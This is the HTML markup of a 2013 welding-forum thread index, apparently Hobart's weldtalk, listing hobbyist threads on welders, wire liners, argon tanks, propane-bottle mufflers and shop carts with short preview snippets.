<span class="label">Started by <a href="member331e.html?28471-Hobby-welder" class="username understate" title="Started by Hobby welder on 08-01-2013 12:16 AM">Hobby welder</a>, 08-01-2013 12:16 AM</span>
<!-- iconinfo -->
<div class="threaddetails td">
<div class="threaddetailicons">
</div>
</div>
</div>
</div>
</div>
</div>
<!-- threadstats -->
<ul class="threadstats td alt" title="">
<li>Replies: <a href="misc2d16.html?do=whoposted&t=117826" onclick="who(117826); return false;" class="understate">0</a></li>
<li>Views: 96</li>
<li class="hidden">Rating0 / 5</li>
</ul>
<!-- lastpost -->
<dl class="threadlastpost td">
<dt class="lastpostby hidden">Last Post By</dt>
<dd><!-- BEGIN TEMPLATE: memberaction_dropdown -->
<div class="popupmenu memberaction">
<a class="username offline popupctrl" href="member331e.html?28471-Hobby-welder" title="Hobby welder is offline"><strong>Hobby welder</strong></a>
<ul class="popupbody popuphover memberaction_body">
<li class="left">
<a href="member331e.html?28471-Hobby-welder" class="siteicon_profile">
View Profile
</a>
</li>
<li class="right">
<a href="searchcd11.html?do=finduser&userid=28471&contenttype=vBForum_Post&showposts=1" class="siteicon_forum" rel="nofollow">
View Forum Posts
</a>
</li>
</ul>
</div>
<!-- END TEMPLATE: memberaction_dropdown --></dd>
<dd>08-01-2013, <span class="time">12:16 AM</span>
<a href="showthread0149.html?117826-syncrowave-200-phased-out-by-miller&p=508611#post508611" class="lastpostdate understate" title="Go to last post"><img src="images/buttons/lastpost-right.html" alt="Go to last post" /></a>
</dd>
</dl>
</div>
</li>
<!-- END TEMPLATE: threadbit --><!-- BEGIN TEMPLATE: threadbit -->
<li class="threadbit hot" id="thread_117725">
<div class="rating0 nonsticky">
<div class="threadinfo" title="Seems like a year ago that I posted a pic of my daughter using the impact wrench to help take apart a motor. Doesn't seem like we ever have time to work in the garage together anymore, but she still likes taking things apart. She'll be a freshman in HS this fall.
My son has grown enough now to...">
<!-- status icon block -->
<a class="threadstatus" rel="vB::AJAX" ></a>
<!-- title / author block -->
<div class="inner">
<h3 class="threadtitle">
<a class="title" href="showthreade49c.html?117725-OT-Kids-sure-grow-up-fast" id="thread_title_117725">OT - Kids sure grow up fast</a>
</h3>
<div class="threadmeta">
<div class="author">
<span class="label">Started by <a href="member5a39.html?7836-whateg0" class="username understate" title="Started by whateg0 on 07-08-2013 03:23 PM">whateg0</a>, 07-08-2013 03:23 PM</span>
<!-- iconinfo -->
<div class="threaddetails td">
<div class="threaddetailicons">
</div>
</div>
</div>
</div>
</div>
</div>
<!-- threadstats -->
<ul class="threadstats td alt" title="">
<li>Replies: <a href="miscda79.html?do=whoposted&t=117725" onclick="who(117725); return false;" class="understate">8</a></li>
<li>Views: 397</li>
<li class="hidden">Rating0 / 5</li>
</ul>
<!-- lastpost -->
<dl class="threadlastpost td">
<dt class="lastpostby hidden">Last Post By</dt>
<dd><!-- BEGIN TEMPLATE: memberaction_dropdown -->
<div class="popupmenu memberaction">
<a class="username offline popupctrl" href="member2b2c.html?16450-gatemaker" title="gatemaker is offline"><strong>gatemaker</strong></a>
<ul class="popupbody popuphover memberaction_body">
<li class="left">
<a href="member2b2c.html?16450-gatemaker" class="siteicon_profile">
View Profile
</a>
</li>
<li class="right">
<a href="searchc2ab.html?do=finduser&userid=16450&contenttype=vBForum_Post&showposts=1" class="siteicon_forum" rel="nofollow">
View Forum Posts
</a>
</li>
</ul>
</div>
<!-- END TEMPLATE: memberaction_dropdown --></dd>
<dd>07-28-2013, <span class="time">10:04 AM</span>
<a href="showthreade123.html?117725-OT-Kids-sure-grow-up-fast&p=508507#post508507" class="lastpostdate understate" title="Go to last post"><img src="images/buttons/lastpost-right.html" alt="Go to last post" /></a>
</dd>
</dl>
</div>
</li>
<!-- END TEMPLATE: threadbit --><!-- BEGIN TEMPLATE: threadbit -->
<li class="threadbit hot attachments" id="thread_117803">
<div class="rating0 nonsticky">
<div class="threadinfo" title="Roy got the one stuck big wheel loose "with Kroil" naturally, and weeks of patience.
Looks like if this Dialarc is still viable, mabey put this cool wheel arrangement under it,
instead of a cart that I'll pile stuff on and shift out of my way from time to time.
Can't decide... but haven't...">
<!-- status icon block -->
<a class="threadstatus" rel="vB::AJAX" ></a>
<!-- title / author block -->
<div class="inner">
<h3 class="threadtitle">
<a class="title" href="showthreadfa8c.html?117803-Marry-the-DialArc-to-the-old-shop-cart-Maybe" id="thread_title_117803">Marry the DialArc to the old shop cart.... Maybe</a>
</h3>
<div class="threadmeta">
<div class="author">
<span class="label">Started by <a href="member9e20.html?6098-vicegrip" class="username understate" title="Started by vicegrip on 07-25-2013 11:13 AM">vicegrip</a>, 07-25-2013 11:13 AM</span>
<!-- iconinfo -->
<div class="threaddetails td">
<div class="threaddetailicons">
<a href="javascript://" onclick="attachments(117803); return false"> <img src="images/misc/paperclip.png" border="0" alt="4 Attachment(s)" /></a>
</div>
</div>
</div>
</div>
</div>
</div>
<!-- threadstats -->
<ul class="threadstats td alt" title="">
<li>Replies: <a href="misc02aa.html?do=whoposted&t=117803" onclick="who(117803); return false;" class="understate">7</a></li>
<li>Views: 273</li>
<li class="hidden">Rating0 / 5</li>
</ul>
<!-- lastpost -->
<dl class="threadlastpost td">
<dt class="lastpostby hidden">Last Post By</dt>
<dd><!-- BEGIN TEMPLATE: memberaction_dropdown -->
<div class="popupmenu memberaction">
<a class="username offline popupctrl" href="member9e20.html?6098-vicegrip" title="vicegrip is offline"><strong>vicegrip</strong></a>
<ul class="popupbody popuphover memberaction_body">
<li class="left">
<a href="member9e20.html?6098-vicegrip" class="siteicon_profile">
View Profile
</a>
</li>
<li class="right">
<a href="searche5e0.html?do=finduser&userid=6098&contenttype=vBForum_Post&showposts=1" class="siteicon_forum" rel="nofollow">
View Forum Posts
</a>
</li>
</ul>
</div>
<!-- END TEMPLATE: memberaction_dropdown --></dd>
<dd>07-27-2013, <span class="time">06:46 AM</span>
<a href="showthread81fe.html?117803-Marry-the-DialArc-to-the-old-shop-cart-Maybe&p=508472#post508472" class="lastpostdate understate" title="Go to last post"><img src="images/buttons/lastpost-right.html" alt="Go to last post" /></a>
</dd>
</dl>
</div>
</li>
<!-- END TEMPLATE: threadbit --><!-- BEGIN TEMPLATE: threadbit -->
<li class="threadbit hot" id="thread_117798">
<div class="rating0 nonsticky">
<div class="threadinfo" title="I gleaned the following out of comments on the topic in a news story.
I intend to do some follow-up..... and sudstanciation later.
I am posting it so others that may find this interesting can do the same.
If you pass me up (which IS likely) please add to this!!
Including expanding on and...">
<!-- status icon block -->
<a class="threadstatus" rel="vB::AJAX" ></a>
<!-- title / author block -->
<div class="inner">
<h3 class="threadtitle">
<img src="images/icons/icon3.png" alt="Lightbulb" border="0" />
<a class="title" href="showthread3ebb.html?117798-Rare-Earth-minerals-Thorium-Reactors" id="thread_title_117798">Rare Earth minerals / Thorium Reactors?</a>
</h3>
<div class="threadmeta">
<div class="author">
<span class="label">Started by <a href="member9e20.html?6098-vicegrip" class="username understate" title="Started by vicegrip on 07-21-2013 08:02 PM">vicegrip</a>, 07-21-2013 08:02 PM</span>
<!-- iconinfo -->
<div class="threaddetails td">
<div class="threaddetailicons">
</div>
</div>
</div>
</div>
</div>
</div>
<!-- threadstats -->
<ul class="threadstats td alt" title="">
<li>Replies: <a href="miscd343.html?do=whoposted&t=117798" onclick="who(117798); return false;" class="understate">8</a></li>
<li>Views: 305</li>
<li class="hidden">Rating0 / 5</li>
</ul>
<!-- lastpost -->
<dl class="threadlastpost td">
<dt class="lastpostby hidden">Last Post By</dt>
<dd><!-- BEGIN TEMPLATE: memberaction_dropdown -->
<div class="popupmenu memberaction">
<a class="username offline popupctrl" href="member9e20.html?6098-vicegrip" title="vicegrip is offline"><strong>vicegrip</strong></a>
<ul class="popupbody popuphover memberaction_body">
<li class="left">
<a href="member9e20.html?6098-vicegrip" class="siteicon_profile">
View Profile
</a>
</li>
<li class="right">
<a href="searche5e0.html?do=finduser&userid=6098&contenttype=vBForum_Post&showposts=1" class="siteicon_forum" rel="nofollow">
View Forum Posts
</a>
</li>
</ul>
</div>
<!-- END TEMPLATE: memberaction_dropdown --></dd>
<dd>07-23-2013, <span class="time">09:36 AM</span>
<a href="showthread652a.html?117798-Rare-Earth-minerals-Thorium-Reactors&p=508422#post508422" class="lastpostdate understate" title="Go to last post"><img src="images/buttons/lastpost-right.html" alt="Go to last post" /></a>
</dd>
</dl>
</div>
</li>
<!-- END TEMPLATE: threadbit --><!-- BEGIN TEMPLATE: threadbit -->
<li class="threadbit hot" id="thread_115853">
<div class="rating5 nonsticky">
<div class="threadinfo" title="Anybody use them? I was looking at them, and ran across this one.
http://www.stronghandtools.com/stronghandtools/products/powerbase.php
Looks like it has one of smallest footprints of the others I've seen. Rated to 300a, but I won't be anywhere near that.">
<!-- status icon block -->
<a class="threadstatus" rel="vB::AJAX" ></a>
<!-- title / author block -->
<div class="inner">
<h3 class="threadtitle">
<a class="title" href="showthreadc521.html?115853-Magnetic-ground-clamps" id="thread_title_115853">Magnetic ground clamps?</a>
</h3>
<div class="threadmeta">
<div class="author">
<span class="label">Started by <a href="member4ab1.html?91203-jshultz78" class="username understate" title="Started by jshultz78 on 07-01-2013 09:04 PM">jshultz78</a>, 07-01-2013 09:04 PM</span>
<!-- iconinfo -->
<div class="threaddetails td">
<div class="threaddetailicons">
</div>
</div>
</div>
</div>
</div>
</div>
<!-- threadstats -->
<ul class="threadstats td alt" title="">
<li>Replies: <a href="misc6469.html?do=whoposted&t=115853" onclick="who(115853); return false;" class="understate">5</a></li>
<li>Views: 492</li>
<li class="hidden">Rating5 / 5</li>
</ul>
<!-- lastpost -->
<dl class="threadlastpost td">
<dt class="lastpostby hidden">Last Post By</dt>
<dd><!-- BEGIN TEMPLATE: memberaction_dropdown -->
<div class="popupmenu memberaction">
<a class="username offline popupctrl" href="member0c0e.html?19282-SidecarFlip" title="SidecarFlip is offline"><strong>SidecarFlip</strong></a>
<ul class="popupbody popuphover memberaction_body">
<li class="left">
<a href="member0c0e.html?19282-SidecarFlip" class="siteicon_profile">
View Profile
</a>
</li>
<li class="right">
<a href="searcha77a.html?do=finduser&userid=19282&contenttype=vBForum_Post&showposts=1" class="siteicon_forum" rel="nofollow">
View Forum Posts
</a>
</li>
<li class="left">
<a href="http://www.flipmeisters.com/" class="siteicon_homepage">
Visit Homepage
</a>
</li>
</ul>
</div>
<!-- END TEMPLATE: memberaction_dropdown --></dd>
<dd>07-21-2013, <span class="time">10:20 PM</span>
<a href="showthread4728.html?115853-Magnetic-ground-clamps&p=508387#post508387" class="lastpostdate understate" title="Go to last post"><img src="images/buttons/lastpost-right.html" alt="Go to last post" /></a>
</dd>
</dl>
</div>
</li>
<!-- END TEMPLATE: threadbit --><!-- BEGIN TEMPLATE: threadbit -->
<li class="threadbit hot attachments" id="thread_117736">
<div class="rating0 nonsticky">
<div class="threadinfo" title="I'd imagine a few others besides me have mentioned the train wreck up North?
Phil">
<!-- status icon block -->
<a class="threadstatus" rel="vB::AJAX" ></a>
<!-- title / author block -->
<div class="inner">
<h3 class="threadtitle">
<a class="title" href="showthread3ebd.html?117736-Roy-your-box-(PM)-is-full!" id="thread_title_117736">Roy your box (PM) is full!</a>
</h3>
<div class="threadmeta">
<div class="author">
<span class="label">Started by <a href="member9e20.html?6098-vicegrip" class="username understate" title="Started by vicegrip on 07-10-2013 10:12 AM">vicegrip</a>, 07-10-2013 10:12 AM</span>
<dl class="pagination" id="pagination_threadbit_117736">
<dt class="label">3 Pages <span class="separator">•</span></dt>
<dd>
<!-- BEGIN TEMPLATE: threadbit_pagelink -->
<span><a href="showthread3ebd.html?117736-Roy-your-box-(PM)-is-full!">1</a></span>
<!-- END TEMPLATE: threadbit_pagelink --> <!-- BEGIN TEMPLATE: threadbit_pagelink -->
<span><a href="showthreada79b.html?117736-Roy-your-box-(PM)-is-full!/page2">2</a></span>
<!-- END TEMPLATE: threadbit_pagelink --> <!-- BEGIN TEMPLATE: threadbit_pagelink -->
<span><a href="showthread209c.html?117736-Roy-your-box-(PM)-is-full!/page3">3</a></span>
<!-- END TEMPLATE: threadbit_pagelink -->
</dd>
</dl>
<!-- iconinfo -->
<div class="threaddetails td">
<div class="threaddetailicons">
<a href="javascript://" onclick="attachments(117736); return false"> <img src="images/misc/paperclip.png" border="0" alt="2 Attachment(s)" /></a>
</div>
</div>
</div>
</div>
</div>
</div>
<!-- threadstats -->
<ul class="threadstats td alt" title="">
<li>Replies: <a href="miscdea1.html?do=whoposted&t=117736" onclick="who(117736); return false;" class="understate">40</a></li>
<li>Views: 1,020</li>
<li class="hidden">Rating0 / 5</li>
</ul>
<!-- lastpost -->
<dl class="threadlastpost td">
<dt class="lastpostby hidden">Last Post By</dt>
<dd><!-- BEGIN TEMPLATE: memberaction_dropdown -->
<div class="popupmenu memberaction">
<a class="username offline popupctrl" href="member31fd.html?4946-usmcpop" title="usmcpop is offline"><strong>usmcpop</strong></a>
<ul class="popupbody popuphover memberaction_body">
<li class="left">
<a href="member31fd.html?4946-usmcpop" class="siteicon_profile">
View Profile
</a>
</li>
<li class="right">
<a href="search0c43.html?do=finduser&userid=4946&contenttype=vBForum_Post&showposts=1" class="siteicon_forum" rel="nofollow">
View Forum Posts
</a>
</li>
</ul>
</div>
<!-- END TEMPLATE: memberaction_dropdown --></dd>
<dd>07-21-2013, <span class="time">06:32 PM</span>
<a href="showthreadb417.html?117736-Roy-your-box-(PM)-is-full!&p=508375#post508375" class="lastpostdate understate" title="Go to last post"><img src="images/buttons/lastpost-right.html" alt="Go to last post" /></a>
</dd>
</dl>
</div>
</li>
<!-- END TEMPLATE: threadbit --><!-- BEGIN TEMPLATE: threadbit -->
<li class="threadbit hot" id="thread_117795">
<div class="rating0 nonsticky">
<div class="threadinfo" title="So far all I've been using in my 210mvp is .030 solid wire, Does the liner HAVE to be changed to run .024? What would happen if I used the stock liner with the smaller wire?">
<!-- status icon block -->
<a class="threadstatus" rel="vB::AJAX" ></a>
<!-- title / author block -->
<div class="inner">
<h3 class="threadtitle">
<a class="title" href="showthread9a50.html?117795-Wire-size-and-liner" id="thread_title_117795">Wire size and liner..?</a>
</h3>
<div class="threadmeta">
<div class="author">
<span class="label">Started by <a href="member4ab1.html?91203-jshultz78" class="username understate" title="Started by jshultz78 on 07-19-2013 06:54 PM">jshultz78</a>, 07-19-2013 06:54 PM</span>
<!-- iconinfo -->
<div class="threaddetails td">
<div class="threaddetailicons">
</div>
</div>
</div>
</div>
</div>
</div>
<!-- threadstats -->
<ul class="threadstats td alt" title="">
<li>Replies: <a href="misc60ab.html?do=whoposted&t=117795" onclick="who(117795); return false;" class="understate">1</a></li>
<li>Views: 194</li>
<li class="hidden">Rating0 / 5</li>
</ul>
<!-- lastpost -->
<dl class="threadlastpost td">
<dt class="lastpostby hidden">Last Post By</dt>
<dd><!-- BEGIN TEMPLATE: memberaction_dropdown -->
<div class="popupmenu memberaction">
<a class="username offline popupctrl" href="member2b2c.html?16450-gatemaker" title="gatemaker is offline"><strong>gatemaker</strong></a>
<ul class="popupbody popuphover memberaction_body">
<li class="left">
<a href="member2b2c.html?16450-gatemaker" class="siteicon_profile">
View Profile
</a>
</li>
<li class="right">
<a href="searchc2ab.html?do=finduser&userid=16450&contenttype=vBForum_Post&showposts=1" class="siteicon_forum" rel="nofollow">
View Forum Posts
</a>
</li>
</ul>
</div>
<!-- END TEMPLATE: memberaction_dropdown --></dd>
<dd>07-19-2013, <span class="time">07:30 PM</span>
<a href="showthreadc809.html?117795-Wire-size-and-liner&p=508343#post508343" class="lastpostdate understate" title="Go to last post"><img src="images/buttons/lastpost-right.html" alt="Go to last post" /></a>
</dd>
</dl>
</div>
</li>
<!-- END TEMPLATE: threadbit --><!-- BEGIN TEMPLATE: threadbit -->
<li class="threadbit hot" id="thread_113922">
<div class="rating5 nonsticky">
<div class="threadinfo" title="Hi everyone,
I would need some help here.
I currently have the T bottle model of compressed Argon:
http://www.praxairdirect.com/Industrial-Gas-and-Welding-Information-Center/Welding-and-Fuel-Gases/Argon.html
I would like to transfer Argon into a brand new smaller bottle like this one:...">
<!-- status icon block -->
<a class="threadstatus" rel="vB::AJAX" ></a>
<!-- title / author block -->
<div class="inner">
<h3 class="threadtitle">
<a class="title" href="showthread46b2.html?113922-Argon-Gas-Tank-transfer-Need-Help-pls" id="thread_title_113922">Argon Gas Tank transfer -- Need Help pls.</a>
</h3>
<div class="threadmeta">
<div class="author">
<span class="label">Started by <a href="member5303.html?91585-bug_140" class="username understate" title="Started by bug_140 on 06-25-2013 09:51 AM">bug_140</a>, 06-25-2013 09:51 AM</span>
<!-- iconinfo -->
<div class="threaddetails td">
<div class="threaddetailicons">
</div>
</div>
</div>
</div>
</div>
</div>
<!-- threadstats -->
<ul class="threadstats td alt" title="">
<li>Replies: <a href="misc3354.html?do=whoposted&t=113922" onclick="who(113922); return false;" class="understate">8</a></li>
<li>Views: 700</li>
<li class="hidden">Rating5 / 5</li>
</ul>
<!-- lastpost -->
<dl class="threadlastpost td">
<dt class="lastpostby hidden">Last Post By</dt>
<dd><!-- BEGIN TEMPLATE: memberaction_dropdown -->
<div class="popupmenu memberaction">
<a class="username offline popupctrl" href="member80fd.html?22044-Wookie" title="Wookie is offline"><strong>Wookie</strong></a>
<ul class="popupbody popuphover memberaction_body">
<li class="left">
<a href="member80fd.html?22044-Wookie" class="siteicon_profile">
View Profile
</a>
</li>
<li class="right">
<a href="search0d66.html?do=finduser&userid=22044&contenttype=vBForum_Post&showposts=1" class="siteicon_forum" rel="nofollow">
View Forum Posts
</a>
</li>
</ul>
</div>
<!-- END TEMPLATE: memberaction_dropdown --></dd>
<dd>07-18-2013, <span class="time">03:20 AM</span>
<a href="showthreadcaa7.html?113922-Argon-Gas-Tank-transfer-Need-Help-pls&p=508320#post508320" class="lastpostdate understate" title="Go to last post"><img src="images/buttons/lastpost-right.html" alt="Go to last post" /></a>
</dd>
</dl>
</div>
</li>
<!-- END TEMPLATE: threadbit --><!-- BEGIN TEMPLATE: threadbit -->
<li class="threadbit hot" id="thread_117794">
<div class="rating0 nonsticky">
<div class="threadinfo" title="Hi All,
I have a new CH 230v ac only machine that is still under warranty, the problem is I know that ac only machines emit the typical buzzing sound, but when the electrode isn't in contact with the work piece it starts clicking and making popping noises for a minute and then stops after a...">
<!-- status icon block -->
<a class="threadstatus" rel="vB::AJAX" ></a>
<!-- title / author block -->
<div class="inner">
<h3 class="threadtitle">
<a class="title" href="showthread1d6b.html?117794-Problem-with-CH-230v-welder" id="thread_title_117794">Problem with CH 230v welder</a>
</h3>
<div class="threadmeta">
<div class="author">
<span class="label">Started by <a href="member9b86.html?17519-Wolff" class="username understate" title="Started by Wolff on 07-17-2013 10:56 PM">Wolff</a>, 07-17-2013 10:56 PM</span>
<!-- iconinfo -->
<div class="threaddetails td">
<div class="threaddetailicons">
</div>
</div>
</div>
</div>
</div>
</div>
<!-- threadstats -->
<ul class="threadstats td alt" title="">
<li>Replies: <a href="misc0f7e.html?do=whoposted&t=117794" onclick="who(117794); return false;" class="understate">1</a></li>
<li>Views: 163</li>
<li class="hidden">Rating0 / 5</li>
</ul>
<!-- lastpost -->
<dl class="threadlastpost td">
<dt class="lastpostby hidden">Last Post By</dt>
<dd><!-- BEGIN TEMPLATE: memberaction_dropdown -->
<div class="popupmenu memberaction">
<a class="username offline popupctrl" href="member331e.html?28471-Hobby-welder" title="Hobby welder is offline"><strong>Hobby welder</strong></a>
<ul class="popupbody popuphover memberaction_body">
<li class="left">
<a href="member331e.html?28471-Hobby-welder" class="siteicon_profile">
View Profile
</a>
</li>
<li class="right">
<a href="searchcd11.html?do=finduser&userid=28471&contenttype=vBForum_Post&showposts=1" class="siteicon_forum" rel="nofollow">
View Forum Posts
</a>
</li>
</ul>
</div>
<!-- END TEMPLATE: memberaction_dropdown --></dd>
<dd>07-17-2013, <span class="time">11:37 PM</span>
<a href="showthreade406.html?117794-Problem-with-CH-230v-welder&p=508318#post508318" class="lastpostdate understate" title="Go to last post"><img src="images/buttons/lastpost-right.html" alt="Go to last post" /></a>
</dd>
</dl>
</div>
</li>
<!-- END TEMPLATE: threadbit --><!-- BEGIN TEMPLATE: threadbit -->
<li class="threadbit hot attachments" id="thread_113966">
<div class="rating5 nonsticky">
<div class="threadinfo" title="Been reading a lot over on the Heavy Equipment Forums on Line Boring.
Seems they setup a welding head to go around and around in slopped out pin holes on various components on construction equipment.
Then go back into the built up hole and bore it true again!
Anybody do this?
The correct way...">
<!-- status icon block -->
<a class="threadstatus" rel="vB::AJAX" ></a>
<!-- title / author block -->
<div class="inner">
<h3 class="threadtitle">
<img src="images/icons/icon5.html" alt="Question" border="0" />
<a class="title" href="showthread5a53.html?113966-Line-Boring" id="thread_title_113966">Line Boring</a>
</h3>
<div class="threadmeta">
<div class="author">
<span class="label">Started by <a href="memberf3fb.html?21193-drujinin" class="username understate" title="Started by drujinin on 06-25-2013 04:24 PM">drujinin</a>, 06-25-2013 04:24 PM</span>
<!-- iconinfo -->
<div class="threaddetails td">
<div class="threaddetailicons">
<img src="images/misc/tag.html" alt="bushing, line boring, pin" />
<a href="javascript://" onclick="attachments(113966); return false"> <img src="images/misc/paperclip.png" border="0" alt="2 Attachment(s)" /></a>
</div>
</div>
</div>
</div>
</div>
</div>
<!-- threadstats -->
<ul class="threadstats td alt" title="">
<li>Replies: <a href="misc7b93.html?do=whoposted&t=113966" onclick="who(113966); return false;" class="understate">12</a></li>
<li>Views: 705</li>
<li class="hidden">Rating5 / 5</li>
</ul>
<!-- lastpost -->
<dl class="threadlastpost td">
<dt class="lastpostby hidden">Last Post By</dt>
<dd><!-- BEGIN TEMPLATE: memberaction_dropdown -->
<div class="popupmenu memberaction">
<a class="username offline popupctrl" href="member475a.html?560-Sberry" title="Sberry is offline"><strong>Sberry</strong></a>
<ul class="popupbody popuphover memberaction_body">
<li class="left">
<a href="member475a.html?560-Sberry" class="siteicon_profile">
View Profile
</a>
</li>
<li class="right">
<a href="search7a48.html?do=finduser&userid=560&contenttype=vBForum_Post&showposts=1" class="siteicon_forum" rel="nofollow">
View Forum Posts
</a>
</li>
</ul>
</div>
<!-- END TEMPLATE: memberaction_dropdown --></dd>
<dd>07-17-2013, <span class="time">02:43 PM</span>
<a href="showthread9123.html?113966-Line-Boring&p=508302#post508302" class="lastpostdate understate" title="Go to last post"><img src="images/buttons/lastpost-right.html" alt="Go to last post" /></a>
</dd>
</dl>
</div>
</li>
<!-- END TEMPLATE: threadbit --><!-- BEGIN TEMPLATE: threadbit -->
<li class="threadbit hot" id="thread_117785">
<div class="rating0 nonsticky">
<div class="threadinfo" title="I have come to the conclusion that welding is a winter sport! I am sweating like a pig. Even my drawers are soaked! Wish I had a shop . . . wish I had a air conditioned shop!">
<!-- status icon block -->
<a class="threadstatus" rel="vB::AJAX" ></a>
<!-- title / author block -->
<div class="inner">
<h3 class="threadtitle">
<a class="title" href="showthreadb089.html?117785-Anybody-else-having-a-problem" id="thread_title_117785">Anybody else having a problem?</a>
</h3>
<div class="threadmeta">
<div class="author">
<span class="label">Started by <a href="memberbd82.html?97437-Henrymac" class="username understate" title="Started by Henrymac on 07-15-2013 04:45 PM">Henrymac</a>, 07-15-2013 04:45 PM</span>
<!-- iconinfo -->
<div class="threaddetails td">
<div class="threaddetailicons">
</div>
</div>
</div>
</div>
</div>
</div>
<!-- threadstats -->
<ul class="threadstats td alt" title="">
<li>Replies: <a href="misc7e1e.html?do=whoposted&t=117785" onclick="who(117785); return false;" class="understate">5</a></li>
<li>Views: 351</li>
<li class="hidden">Rating0 / 5</li>
</ul>
<!-- lastpost -->
<dl class="threadlastpost td">
<dt class="lastpostby hidden">Last Post By</dt>
<dd><!-- BEGIN TEMPLATE: memberaction_dropdown -->
<div class="popupmenu memberaction">
<a class="username offline popupctrl" href="member475a.html?560-Sberry" title="Sberry is offline"><strong>Sberry</strong></a>
<ul class="popupbody popuphover memberaction_body">
<li class="left">
<a href="member475a.html?560-Sberry" class="siteicon_profile">
View Profile
</a>
</li>
<li class="right">
<a href="search7a48.html?do=finduser&userid=560&contenttype=vBForum_Post&showposts=1" class="siteicon_forum" rel="nofollow">
View Forum Posts
</a>
</li>
</ul>
</div>
<!-- END TEMPLATE: memberaction_dropdown --></dd>
<dd>07-17-2013, <span class="time">02:26 PM</span>
<a href="showthreadfb06.html?117785-Anybody-else-having-a-problem&p=508300#post508300" class="lastpostdate understate" title="Go to last post"><img src="images/buttons/lastpost-right.html" alt="Go to last post" /></a>
</dd>
</dl>
</div>
</li>
<!-- END TEMPLATE: threadbit --><!-- BEGIN TEMPLATE: threadbit -->
<li class="threadbit hot attachments" id="thread_117781">
<div class="rating0 nonsticky">
<div class="threadinfo" title="I want to build a muffler for my generator. I want to use the quart sized propane bottles....3 of em in a row, end to end.
My question, if I remove the schrader valve, and then drill a hole in them, could they be welded on w/o blowing myself up?">
<!-- status icon block -->
<a class="threadstatus" rel="vB::AJAX" ></a>
<!-- title / author block -->
<div class="inner">
<h3 class="threadtitle">
<a class="title" href="showthreade096.html?117781-welding-on-propane-tanks" id="thread_title_117781">welding on propane tanks?</a>
</h3>
<div class="threadmeta">
<div class="author">
<span class="label">Started by <a href="memberbb84.html?15965-Stinky" class="username understate" title="Started by Stinky on 07-15-2013 03:07 AM">Stinky</a>, 07-15-2013 03:07 AM</span>
<!-- iconinfo -->
<div class="threaddetails td">
<div class="threaddetailicons">
<a href="javascript://" onclick="attachments(117781); return false"> <img src="images/misc/paperclip.png" border="0" alt="1 Attachment(s)" /></a>
</div>
</div>
</div>
</div>
</div>
</div>
<!-- threadstats -->
<ul class="threadstats td alt" title="">
<li>Replies: <a href="misc118c.html?do=whoposted&t=117781" onclick="who(117781); return false;" class="understate">7</a></li>
<li>Views: 475</li>
<li class="hidden">Rating0 / 5</li>
</ul>
<!-- lastpost -->
<dl class="threadlastpost td">
<dt class="lastpostby hidden">Last Post By</dt>
<dd><!-- BEGIN TEMPLATE: memberaction_dropdown -->
<div class="popupmenu memberaction">
<a class="username offline popupctrl" href="member9e20.html?6098-vicegrip" title="vicegrip is offline"><strong>vicegrip</strong></a>
<ul class="popupbody popuphover memberaction_body">
<li class="left">
<a href="member9e20.html?6098-vicegrip" class="siteicon_profile">
View Profile
</a>
</li>
<li class="right">
<a href="searche5e0.html?do=finduser&userid=6098&contenttype=vBForum_Post&showposts=1" class="siteicon_forum" rel="nofollow">
View Forum Posts
</a>
</li>
</ul>
</div>
<!-- END TEMPLATE: memberaction_dropdown --></dd>
<dd>07-16-2013, <span class="time">01:47 AM</span>
<a href="showthread750b.html?117781-welding-on-propane-tanks&p=508271#post508271" class="lastpostdate understate" title="Go to last post"><img src="images/buttons/lastpost-right.html" alt="Go to last post" /></a>
</dd>
</dl>
</div>
</li>
<!-- END TEMPLATE: threadbit --><!-- BEGIN TEMPLATE: threadbit -->
<li class="threadbit hot" id="thread_117742">
<div class="rating0 nonsticky">
<div class="threadinfo" title="I have a problem, I am doing some restoration fork on a steel grain hopper trailer I need to repair about 20 ft of the frame rail that has been damaged by years of rust I am cleaning up all the rust and grinding down the paint and going to lay a formed 11 gauge reinforcement over the existing frame...">
<!-- status icon block -->
<a class="threadstatus" rel="vB::AJAX" ></a>
<!-- title / author block -->
<div class="inner">
<h3 class="threadtitle">
<a class="title" href="showthread5dee.html?117742-Overhead-lighter-gauge" id="thread_title_117742">Overhead lighter gauge</a>
</h3>
<div class="threadmeta">
<div class="author">
<span class="label">Started by <a href="memberccd2.html?2230-fabricator" class="username understate" title="Started by fabricator on 07-12-2013 12:39 AM">fabricator</a>, 07-12-2013 12:39 AM</span>
<!-- iconinfo -->
<div class="threaddetails td">
<div class="threaddetailicons">
</div>
</div>
</div>
</div>
</div>
</div>
<!-- threadstats -->
<ul class="threadstats td alt" title="">
<li>Replies: <a href="miscc9bc.html?do=whoposted&t=117742" onclick="who(117742); return false;" class="understate">3</a></li>
<li>Views: 249</li>
<li class="hidden">Rating0 / 5</li>
</ul>
<!-- lastpost -->
<dl class="threadlastpost td">
<dt class="lastpostby hidden">Last Post By</dt>
<dd><!-- BEGIN TEMPLATE: memberaction_dropdown -->
<div class="popupmenu memberaction">
<a class="username offline popupctrl" href="memberfcef.html?47294-weldaway" title="weldaway is offline"><strong>weldaway</strong></a>
<ul class="popupbody popuphover memberaction_body">
<li class="left">
<a href="memberfcef.html?47294-weldaway" class="siteicon_profile">
View Profile
</a>
</li>
<li class="right">
<a href="searchd293.html?do=finduser&userid=47294&contenttype=vBForum_Post&showposts=1" class="siteicon_forum" rel="nofollow">
View Forum Posts
</a>
</li>
</ul>
</div>
<!-- END TEMPLATE: memberaction_dropdown --></dd>
<dd>07-14-2013, <span class="time">07:15 AM</span>
<a href="showthreadc891.html?117742-Overhead-lighter-gauge&p=508211#post508211" class="lastpostdate understate" title="Go to last post"><img src="images/buttons/lastpost-right.html" alt="Go to last post" /></a>
</dd>
</dl>
</div>
</li>
<!-- END TEMPLATE: threadbit -->
</ol>
</div>
<hr />
<div class="noinlinemod forumfoot">
</div>
<input type="hidden" name="url" value="" />
<input type="hidden" name="s" value="" />
<input type="hidden" name="securitytoken" value="guest" />
<input type="hidden" name="forumid" value="13" />
</form>
</div>
<div id="below_threadlist" class="noinlinemod below_threadlist">
<div class="threadpagenav">
<!-- BEGIN TEMPLATE: pagenav -->
<form action="http://www.hobartwelders.com/weldtalk/forumdisplay.php?13-General-Welding-Questions/page51" method="get" class="pagination popupmenu nohovermenu">
<input type="hidden" name="f" value="13" />
<span><a href="javascript://" class="popupctrl">Page 1 of 89</a></span>
<!-- BEGIN TEMPLATE: pagenav_curpage -->
<span class="selected"><a href="javascript://" title="Results 1 to 25 of 2,213">1</a></span>
